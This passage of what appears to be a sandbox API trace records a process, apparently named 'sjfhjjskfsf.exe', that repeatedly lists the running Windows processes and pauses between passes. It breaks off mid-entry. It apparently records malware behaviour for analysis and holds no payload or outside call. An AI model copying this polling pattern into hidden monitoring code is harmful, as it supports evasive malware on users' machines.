lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.519] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.519] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.520] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.520] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.520] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.521] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.521] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.521] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.521] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.522] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.522] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.522] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.522] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.523] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.523] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.523] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.524] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.524] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.524] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.525] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.525] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.525] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.525] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0222.526] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0222.526] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.526] Process32NextW (in: hSnapshot=0x24c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0222.526] Sleep (dwMilliseconds=0x64) [0222.658] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x250 [0222.659] Process32FirstW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.659] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.660] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.660] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.660] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.661] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.661] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.661] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.661] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.662] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.662] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.662] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.662] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.663] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.663] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.663] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.664] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.664] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.664] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.664] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.665] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.665] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.665] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.666] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0222.666] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0222.666] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.666] Process32NextW (in: hSnapshot=0x250, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0222.667] Sleep (dwMilliseconds=0x64) [0222.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x254 [0222.800] Process32FirstW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.800] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.800] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.801] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.801] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.801] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.801] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.802] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.802] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.802] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.803] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.803] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.803] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.803] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.804] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.804] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.804] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.804] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.805] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.805] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.805] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.806] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.806] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.806] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0222.806] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0222.807] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.807] Process32NextW (in: hSnapshot=0x254, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0222.807] Sleep (dwMilliseconds=0x64) [0222.939] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x258 [0222.940] Process32FirstW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.940] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: 